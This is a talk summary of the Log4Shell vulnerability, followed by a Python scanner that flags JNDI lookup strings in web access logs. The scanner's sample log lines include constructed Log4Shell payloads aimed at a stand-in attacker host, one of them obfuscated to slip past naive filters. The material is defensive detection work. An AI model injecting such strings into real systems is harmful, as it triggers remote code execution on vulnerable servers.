About this talk
On December 10, 2021, the security industry was shaken when a critical remote code execution vulnerability dubbed "Log4Shell" was publicly disclosed. Security researcher Chen Zhaojun of Alibaba first reported the vulnerability to the Apache Foundation on November 24, 2021. On December 9, 2021, an attack on servers hosting the game Minecraft was discovered. Further forensic analysis found that cybercriminals had discovered the flaw earlier and had been exploiting it since at least December 1, 2021. What followed was a continuous onslaught by attackers, including ransomware groups and nation-state actors, that left cyber defenders scrambling for mitigations. Financially motivated adversaries quickly adopted publicly available proof-of-concept (PoC) code to deploy malicious payloads on vulnerable target systems; most deployed payloads involved XMRig miners, reverse shells, remote access trojans and botnets. Without proper mitigations or patching, attackers can use the vulnerability to deploy malware, reverse shells and other threats on affected systems. Industry reports of other threats targeting operating systems and frameworks vulnerable to Log4j2 exploitation include beacons, such as Cobalt Strike and Metasploit, being deployed in an attempt to establish a foothold in target environments. The vulnerability affects the Apache Log4j Java-based logging platform used for web server and application logging. The vulnerability, published as CVE-2021-44228, enables a remote attacker to take control of an internet-facing device if the device is running certain versions of Log4j. The Apache Software Foundation, which publishes the Log4j 2 library, gave the vulnerability a CVSS score of 10 out of 10, the highest severity score, because of its potential for widespread exploitation and the ease with which malicious attackers can exploit it.
An attacker triggers the vulnerability when a specially crafted string, supplied through any of a variety of input vectors, is parsed and processed by Log4j. The string ends up appended to the web server's access logs. When Log4j processes these log entries and encounters the string, the bug forces the server to make a callback, or request, to the URL contained in the JNDI string. Threat actors can then use that URL to deliver Base64-encoded commands or Java classes that execute on the vulnerable device.
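The detection side of the mechanism described above, as an added example that is not part of the talk or of any Log4j project code: a small scanner that flags access-log lines carrying a JNDI lookup marker (`${jndi:`). Because Log4j resolves nested lookups before the JNDI one, a naive grep for the literal marker misses strings that spell it out piecewise with `${lower:j}`, `${upper:J}` or the default-value form `${::-j}`; the scanner first collapses those simple inner lookups to their literal value and only then looks for the marker. The sample log lines and the `attacker.invalid` host are constructed for the example.

```python
"""Flag Log4Shell-style JNDI lookup strings in web server access logs.

Added example; the log lines below are constructed, not real traffic.
Detection only: it reports where the marker appears so an analyst can
triage the source and confirm the host runs a fixed Log4j release.
"""
import re

# Innermost lookups with no nested braces: ${lower:X}, ${upper:X}, or the
# default-value form ${key:-X} (of which ${::-X} is the empty-key case).
_INNER = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}",
                    re.IGNORECASE)
# The marker we are ultimately looking for, after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse simple inner lookups to their literal value, innermost first.

    Repeats until nothing changes (or max_rounds), so that
    "${${lower:j}ndi:${::-l}dap://h/a}" becomes "${jndi:ldap://h/a}".
    """
    def repl(m: re.Match) -> str:
        func, arg, default = m.group(1), m.group(2), m.group(3)
        if func is None:          # default-value form: ${...:-X} -> X
            return default
        return arg.lower() if func.lower() == "lower" else arg.upper()

    for _ in range(max_rounds):
        new = _INNER.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return [{"line": n, "indicator": str}] for every line with a JNDI marker."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            # Keep a short excerpt starting at the marker for the analyst.
            hits.append({"line": n, "indicator": norm[m.start():m.start() + 60]})
    return hits


# Constructed access-log lines: one benign, one plain marker in the
# User-Agent, one obfuscated marker, and one harmless non-JNDI lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://attacker.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['indicator']}")
```

Run it against a real access log with `scan(open(path).read().splitlines())`. A hit is a triage lead, not proof of compromise: the marker only causes harm on hosts running an affected Log4j 2 version, so pair the scan with an inventory of which services embed Log4j and with egress monitoring for the outbound LDAP or RMI callback the text describes.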